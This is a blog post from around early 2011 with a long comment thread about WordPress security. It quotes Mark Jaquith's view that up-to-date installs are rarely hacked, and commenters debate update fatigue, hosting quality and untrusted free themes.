The article How did WordPress win? has certainly been making its rounds the last two days, but all eyes seem to be (for the most part) on this comment by core developer Mark Jaquith, who sums up the state of WordPress security quite well. It sure is hard to avoid quoting the entire thing here, but here are a few key points:
I haven’t seen an up-to-date WordPress install get directly exploited in around five years. Seriously. Every time I investigate a compromised WordPress install, it is either because they were running an old version (usually not just a little bit old, but really old), or because their web host was compromised.
[…]
When you’re paying $5 a month for hosting, three things will usually suffer: Stability, Security, and Support.
[…]
Two big priorities right now are: (a) making it super easy to stay up-to-date and (b) pushing web hosts to get their act together.
To summarize the major points in the comment, your WordPress installation is safe as long as it’s up to date (and your password is good), the developers are working on ways to make staying up to date easier, and make sure that your hosting provider isn’t taking shortcuts with their security.
As a gentle reminder after reading this article, WordPress 3.0.5 and 3.1-RC4 were released a few days ago, so don’t forget to update your installation!
I agree, my WordPress installation is safe as long as it’s up to date. And luckily, the WordPress team reacts promptly on any security issue by releasing a new version. What bothers me though is the multitude of so-called ‘free’ themes and plugins on the web. Many of them contain malicious code. This coupled with the fact that WordPress is one of the easiest systems to install themes and plugins on could bring a lot of trouble.
People with hardly any knowledge about MySQL, PHP and their exploits can setup their system within 5 minutes. When they cannot find a suitable theme on the WordPress.org site, another one is easily found via Google. There goes your secure system, and with it your perception of WordPress security overall. Would a novice user know about handy plugins like exploit-scanner? I think not. Wouldn’t it be great if such functionality would be available in WordPress core? Or shouldn’t there at least be some kind of warning when a suspicious theme or plugin is installed? A check if the plugin or theme is hosted on WordPress.org could be a first step.
I was paying $20/month to a host that got me hacked twice (this host is on the WP recommended list of hosts page, so I’m not sure why they’re there unless there is $ involved – this host was called out for widespread compromises last year). I keep my installs up-to-date immediately and sometimes via the beta plugin.
So, the $5/month comment isn’t necessarily accurate. $20/month did me far more damage than an $8/month account I’ve had for years.
BB
Let me guess … Media Temple?
For the price you pay, Media Temple’s Grid Hosting (gs) service has got to be the worst I’ve ever experienced. With all the support they seem to give to the community, I don’t know why everyone seems to give them a pass on their horrible (GS) hosting service.
MT’s GS is far from perfect. But to be fair, I’ve had all my WP sites on a GS plan for many years, and the only time I’ve been hacked was when someone using a WP site on my space didn’t upgrade for several 2.x versions. Since then I upgrade them all myself and security hasn’t been an issue.
Security issues aside (http://digwp.com/2010/07/media.....ress-hack/), I’m glad to be off of Media Temple’s GS from a performance standpoint.
This is great to hear. My one concern with using WordPress was that security could be an issue, we have taken the proper precautions. We just finished our new website with WordPress last week and are very pleased. I am glad to hear such great reviews on the security updates. I recommend WordPress with the highest regard.
It’s great that Mark chipped into that debate with the facts. But I was also caught by this comment, specifically the criticism of the recent spate of security fixes for 3.0.
I have no time for people overstating WordPress’s security flaws just because they want to have a go at a giant and look big. And, in the end, I will err on the side of trusting the WP core developers, accepting that sh*t happens, and 3.0.2, 3.0.3, 3.0.4 and 3.0.5 happening in the space of a couple of months is just one of those things.
But like anyone who manages a number of WP sites, I wonder. Fingers crossed that this was “one of those things”, and that future releases will make keeping up-to-date easier.
Bottom line for now: WP is totally safe if you keep updated and only use wordpress.org themes and plugins!
Easy to secure or not, wordpress might have been winning, but it is on my loser list now. I no longer suggest wordpress to friends or clients. I have spent so much time doing updates for core and plugins that I have nightmares of cuteftp pro re-writing wp-thi and wp-that. Not all web hosts are setup to work properly with the auto-update feature, and all these updates are killing my productivity.
I ask one more time, PLEASE stop coming out with new features!
I want a secure base version of WP – call it 3.1.2 Freeze. A secure version of WP that I can leave alone and not update at all. Something that will let me blog for 6 months without having to update the core and the plugins.
IF core developers want to add some new features release some plugins. I want to see WP V 3.2 and 3.3 become optional upgrades. I want news that says “woops! security flaw in 3.3.1 – you must update all your blogs to 3.3.2, unless you are running the 312 freeze version, which is not affecting my our lack of securing the feature creep.
How many updates has joomla had the past few years? Maybe that would save a lot of time.
Fantastic idea.
Love the “feature creep” terminology. Introduction of something new can break something somewhere else so it’s a never ending cycle of security updates/patches.
I really wish that the WP Team would focus on security first, rather than the multitude of “features” and toys that come with the major releases. Security seems like it’s always last on the list because it isn’t sexy.
David,
I do believe that they do focus on security first, quite heavily in fact.
Case in point would be right now. They are busting their asses trying to release the much overdue 3.1 version, but are still pushing out regular .0x security releases.
If security was a second rate issue for them, why would they bother?
Cheers
Ben
I think the fact that you’re looking for something that won’t need updating at all is kind of unrealistic. Pretty much all of the blogging/CMS softwares I’ve come across have had updates, even if it was once in a while.
Why do you think it is not realistic? Couldn’t someone take WP 2.9.2 and strip the xmlrpc and say this is secure, do not upgrade it and you should be fine? Maybe give me WP 1.5 and say if you don’t need the new fancy features you can leave that?
All it would take is for someone to establish a WP that is secure and call it a freeze version. Then any time a security flaw found, someone checks to see if it affects only the newer version, or if it is retro as well.
The message in the dashboard would say “you are using WP freeze and it is still secure” – there are optional updates if you want the latest features.
Of course plugins would have to have a listing saying if they work with the freeze version, or if they require the latest WP – but for a dozen of my blog sites, I would never need the newest plugins. I just need a basic blog, not a thousand updates for WP and a couple of plugins.
Certainly there will be WP sites that take advantage of the newest features that have crept in, but I wonder out of a million downloads, how many people use taxonomies? I love the feature and have some use for it on a couple of my blogs, but most of the blogs I update will never need the new features.
There’s the problem with your “Freeze Version” idea. The exploiters are ever coming up with new ways to do their mischief. Even a “Freeze Version” would likely need to be upgraded from time to time due to new exploit techniques.
You end up in the same place.
Instead why not offer updating & maintenance packages for security purposes (not to mention integration of new features) as a value added service for your clients? That equals more revenue for your business!
“Instead why not offer updating & maintenance packages for security purposes (not to mention integration of new features) as a value added service for your clients?”
Most of my clients are family and friends that don’t have the money to pay a web designer, or pay me for doing upgrades (I have actually brought this up before) – many of the people using WP are not well off, hence the appeal of free blogging software.
Some people also use WP to serve mainly static pages, only updating a few times year. If I charged for every WP and plugin upgrade, it would be cheaper for them to just pay a designer to add pages to a static site.
An upgrade from time to time, like a couple times a year is many times better than the 20 or so updates a year we are doing now, and add the plugin updates into the mix.. and theme updates when core changes cause mischief. Really makes joomla and regular static html publishes cost about the same.
With a WP freeze version, I could still tell everyone how they can build their own web sites with really great free software. With constant upgrades it becomes more work for features that are not needed. It also leaves other sites that are on shared servers in danger of issues caused by someone else who does not check on WP updates on a daily basis.
Most WP users only use a few plugins, I’m sure most of my bloggers wouldn’t mind being stuck with a freeze version of wp-cache or allinoneso. They’d much rather have that, than to have to upgrade a dozen times just to have a few new bells and whistles.
@Steve, very good point about the fact that many WP users aren’t well off. A huge part of why I moved from working with larger CMS’s to WP was so I could exploit my professional skills to help out friends doing worthy projects for little to no money. Obviously, reducing the number of upgrades required for these kinds of sites would be great.
However, even though I’m a bit miffed at the recent spate, your “20 or so updates a year” is a wild exaggeration. http://wordpress.org/news/category/releases/ indicates 7 updates in 2010, 8 in 2009, 7 in 2008, etc.
On top of that, there wasn’t really a need to go for all of them. I don’t think 3.0 included any security fixes; and not all of the 3.0.x releases applied to every kind of installation (certainly sounds like a lot of your sites didn’t require many, if any of them, if you read about what the fixed vulnerabilities actually are). I’d say maybe 3-4 essential updates in 2010 for a basic WP sites.
Plugins are a different issue. Generally, plugin upgrades are feature releases, so you can ignore them if you want. But who has time to read the release notes for every plugin upgrade on all their WP sites? A really nifty plugin would be one that alerted you (via email or in WP) when there’s a plugin on your site that has a security fix in a new version. Maybe the plugin repository could include some kind of standardized mechanism to flag security fixes?
Anyway, WP is more popular and more complex now. It’s different. Perhaps it’s getting to the stage where it’s no longer suitable for some very basic sites. If it takes as little or less time to do a site in flat HTML as in WP, I don’t see a problem with WP – just do the site in flat HTML 😉
Really? *You* have to do the updates? The users can’t click the one check-box and then click the update button?
I’ve used WordPress since the great MoveableType license debacle and, frankly, one of the best features they added was the simplified update. It took me a while to actually use it though, because like you seem to, I fear change. No, seriously, I’m afraid of technological changes in things that I use on a daily basis because I know that one small change can mean disaster for me. I know because I make my living from that simple fact. I am an entire IT Department these days and I don’t have time or patience to screw around with tedious updates on my personal time. The WordPress auto-update feature cuts down on that in huge ways.
Also, as someone else pointed out, thanks to security updates, a “freeze” version is virtually impossible. Even Windows and Linux and OS X have security updates to their “stable” versions.
I think it’s important to have reasonable expectations in regards to updates. I don’t always like the additional features they add during updates either, but, sometimes, those changes open up new possibilities for managing a website or blog that I had never even considered.
So, embrace the philosophy of Herodotus, “All is flux, nothing stays still.” Change is the only constant in the Universe. It’s science!
I agree, and I frequently remind myself that “everything is temporary”. The auto update is very nice, we love it – unfortunately it does not work on two of our webservers, even if given the ftp credentials, it fails on one of our servers, and leaves my blogger with a “maintainance mode notice, even when going to dotcom/wp-admin” – so as nice as it is for several of our sites, it is actually quite a hindrance on our other two servers.
I love WP, and do not mind doing updates on sites that actually get new content added on a regular basis. I spent a good amount of time convincing friends and family that they should use it to build their own web sites easily, with the ability to edit pages themselves, it saves time and money. I have made pages and presentation showing people how they can save time and money by using WP to create even simple static sites.
With all of the great themes and customization options it is a great choice. But for one friend who used WP and a nice theme for her pet sitting side project, she loves the look of the theme, but she has had no need to add content to the site in the past two years. It’s a great example of using WP for a web site, using static pages that looks like a web site, and not like a blog. She has no need to edit pages and add content, but we have needed to upgrade the WP many times, as everyone is unsure if an update provides a security patch for previous versions.
As mentioned earlier, it just may be time to go back to the static html sites for many people, as things have changed to make WP more robust, and more work. If someone would come out and say running 2.8.6 is fine, with no need to ever update, that would be great, that is all we need. If I had just made some sites in static html instead of convincing people about the power of WP, then I would of saved everyone a lot of time, so it may be my WP 2011 resolution to convert sites that are not being used as blogs into static html, that way I won’t be bothered to update them, or any plugins all year.
I will still wish we had a freeze version, even if it was version 2.5 – something we could be sure was stable and secure, without bells and whistles that at this point are becoming time intensive to keep up with. Then I could suggest people use that for simple web sites.
I wonder how many WP sites are live online today that are not 3.05? Couldn’t automattic release new features as optional plugins throughout the year and only do a major core update two times a year. Of it doesn’t matter I guess, in the time it has taken me to write these replies here, I could of copied a couple of sites pages and made them static html.
@steve_taylor – thanks for pointing that out, 7 updates is better than 20 – it just seemed like a lot this past year, I am guessing all the theme updates and plugin updates have made it seem worse, and perhaps those have eaten up as much time as the WP updates.. although doing them through ftp where you wait for the server to delete all the wp-admin and wp-include files, then uploading all the core files does take a while when doing many wp sites.. I use to make backups (through wp export, and phpmyadmin, and through ftp) too – but not in 2010 – too much work.
Ah, I must have missed where you mentioned that some of your servers were having problems with the autoupdate feature. Might be worth taking up with the provider as I’m almost certain it’s a configuration problem at their end. I’ve been on quite a few webhosts, both for my own sites and for other folks, and I’ve never had an issue. Honestly, the autoupdate feature is probably the single best feature since 2.5, for me. It’s ironic that I was terrified of it when it was announced and now I can’t imagine how I’d live without it!
Of course, as much as I love WordPress, it’s not a cure-all. There are just some sites that don’t need it. A static site that doesn’t get new or updated information added to it on a regular basis probably doesn’t actually *need* WP. I think that’d be a case of the “right tool for the right job” and sticking with some basic, static HTML or PHP. WordPress would be overkill and, as you point out, a maintenance nightmare for little to no return.
Unless there was a non-obvious reason to go with something more complicated.
In any case, I think regular updates are part of *all* software packages these days, no matter what we want. It’s the way of the world, I’m afraid.
When they cannot find a suitable theme on the WordPress.org site, another one is easily found via Google. There goes your secure system, and with it your perception of WordPress security overall.
Thankfully, hackers are idiots. The ones smart enough to find the security holes are not dumb enough to resort to hacking.
I almost ended up in an argument a month or so ago when a Rails developer I know insisted that WordPress was constantly being hacked. He said he knew this because he always read about it via news sources. He seemed surprised when I said I had never heard of a WordPress install getting hacked because of a WordPress security issue. I’m not sure whether he believed me that WordPress has been very secure over the years, but either way, such opinions are both common and disappointing.
WordPress has had a security PR issue for a while now. I’m not sure there is any solution to it though, other than for the likes of Mark Jaquith to keep reiterating how rare it is for WordPress itself to be compromised.
From what I can tell, there is only one downside to WordPress, but sadly it’s a major one – Matt Mullenweg. This guy is a self obsessed totalitarian with holier than thou attitude which forces everyone who works for him to kiss his ass to a point of eternal shame. Everyone behind WP is on their feet when the name of Matt Mullenweg is brought up and scared shitless to let any criticism of him get pass. WP would have been a solid platform if it weren’t for this man’s obsession with himself. Progress and common sense are hence sacrificed for things that please this man’s ego.
Quoting what I said there:
Why would anyone build for an OS other than Windows? When you answer that question, you’ll have an answer for your question about WordPress.
i would recommend word press never had any problems with it and our clinets have never had any issues picking up how to update the site them selves.
I would like to chime in and say that in 2011 and in the world of free and open source software implying $5 hosting not being secure is one of the worst things one can perpetuate. Hardware costs can be high of course. But safe can be cheap and in fact it cheap, often it is free! It is the support and knowledge of the hosting company that matters.
as long as we regularly update our wp, the possibility of our sites in the hack is minimized. also install security plugin will add to our site’s security.
It’s Monday 2/14 and there is no new mandatory WP security up-date to install! That’s hundred+ sites that can rest easy for another week…
Don’t get me wrong, I like WP security. But four or five mandatory up-dates in less than two months causes a lot of busy work. Not to mention the inevitable plug-in up-dates to follow. And, the beta in process.
Happy Valentine Day, All!
Wow, never knew hosting was related to security – I always figured it would be the password & username settings. Do you have any sites you recommend/don’t recommend hosting with?
Never had a problem with security on any of my sites. I keep them up to date mostly because I hate seeing the notice(s) to do it. That is the whole idea behind them I guess. I have to do the .5 but i have 10 site and each I have to do manually. Need Time to do in one eve.
Great article James!